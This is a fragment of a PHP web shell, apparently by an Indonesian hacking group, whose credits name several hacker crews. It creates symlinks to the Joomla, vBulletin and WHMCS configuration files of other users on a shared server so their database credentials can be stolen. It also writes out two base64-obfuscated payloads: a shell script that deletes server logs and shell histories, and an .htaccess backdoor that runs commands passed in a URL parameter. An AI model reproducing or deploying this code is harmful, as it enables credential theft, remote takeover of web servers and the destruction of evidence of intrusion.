@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt'); @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt'); @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt'); @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt'); @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt'); @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt'); @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt'); @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt'); @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt'); @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt'); @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt'); @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt'); @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt'); @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');} echo 'Done -> Open configs';} } //////////////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'about')) {@ini_set('output_buffering',0); echo "
<tr>
<td valign=top bgcolor=#151515 class=style2 style=width: 139px>
<center><b><font size=5 style=italic color=#00ff00>About</font></b></center></td></tr></table>
"; ?>
Thanks To :
Allah S.W.T
My Parent
Yulia Susanti
All Member Security Exploded
1N73CTION
B374K
AnonGhost
WSO
C100
BlackShadow
Madspot
=[ Grub & Forum ]=
Pentest & Security Indonesia
Kali Linux Indonesia
Surabaya Black Hat
Indonesian Backtrack Team
By
Security Exploded a.k.a ./Port22
Special Present To :
18 Mar 2014
<textarea class="output" readonly></textarea> | |
=$prompt; ?> |
------[ Select Your Favorit Tools ]------ htaccess Shell [ .htaccess ] Server Log Cleaner [ serverLC.sh ] Bypass Disable Function in Apache Bypass Disable Function in Litespeed |
elseif ( $pilih == 'slc') {
$slc ="IyEvYmluL3NoDQojIFJlY29kZWQgQnkgLi9Qb3J0MjIgKE1TdXBpYW4pDQojIEdyMzN0eiA6IEFsbCBNZW1iZXJzIE9mIFNlY3VyaXR5IEV4cGxvZGVkDQojIGNobW9kIDA3NTUgc2VydmVyTEMuc2ggPj4gLi9zZXJ2ZXJMQy5zaA0KDQplY2hvICJbKl0gR29pbmcgVG8gRGVsZXRlIExvZyBTZXJ2ZXJzIC4uLiAiDQpmaW5kIC8gLW5hbWUgKi5iYXNoX2hpc3RvcnkgLWV4ZWMgcm0gLXJmIHt9IFw7DQpmaW5kIC8gLW5hbWUgKi5iYXNoX2xvZ291dCAtZXhlYyBybSAtcmYge30gXDsNCmZpbmQgLyAtbmFtZSAibG9nKiIgLWV4ZWMgcm0gLXJmIHt9IFw7DQpmaW5kIC8gLW5hbWUgKi5sb2cgLWV4ZWMgcm0gLXJmIHt9IFw7DQpybSAtcmYgL3RtcC9sb2dzDQpybSAtcmYgJEhJU1RGSUxFDQpybSAtcmYgL3Jvb3QvLmtzaF9oaXN0b3J5DQpybSAtcmYgL3Jvb3QvLmJhc2hfaGlzdG9yeQ0Kcm0gLXJmIC9yb290Ly5rc2hfaGlzdG9yeQ0Kcm0gLXJmIC9yb290Ly5iYXNoX2xvZ291dA0Kcm0gLXJmIC91c3IvbG9jYWwvYXBhY2hlL2xvZ3MNCnJtIC1yZiAvdXNyL2xvY2FsL2FwYWNoZS9sb2cNCnJtIC1yZiAvdmFyL2FwYWNoZS9sb2dzDQpybSAtcmYgL3Zhci9hcGFjaGUvbG9nDQpybSAtcmYgL3Zhci9ydW4vdXRtcA0Kcm0gLXJmIC92YXIvbG9ncw0Kcm0gLXJmIC92YXIvbG9nDQpybSAtcmYgL3Zhci9hZG0NCnJtIC1yZiAvZXRjL3d0bXANCnJtIC1yZiAvZXRjL3V0bXANCg0KZWNobyAiWypdIERvbmUgLiBHb29kIEx1Y2sgOyki";
file_put_contents("serverLC.sh",base64_decode($slc));
echo "<script>alert('Server Log Cleaner [ serverLC.sh ] Created'); hideAll();</script>";
die();
}
elseif ( $pilih == 'htasell') {
$ht = 'PEZpbGVzIH4gIl5cLmh0Ij4NCk9yZGVyIGFsbG93LGRlbnkNCkFsbG93IGZyb20gYWxsDQo8L2ZpbGVzPg0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAuaHRhY2Nlc3MNCiMgPD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTs/Pg0K';
file_put_contents(".htaccess",base64_decode($ht));
echo "<script>alert('htaccess Shell [ .htaccess ] Created : open in site/.htaccess?cmd= '); hideAll();</script>";
die();
}
}
?>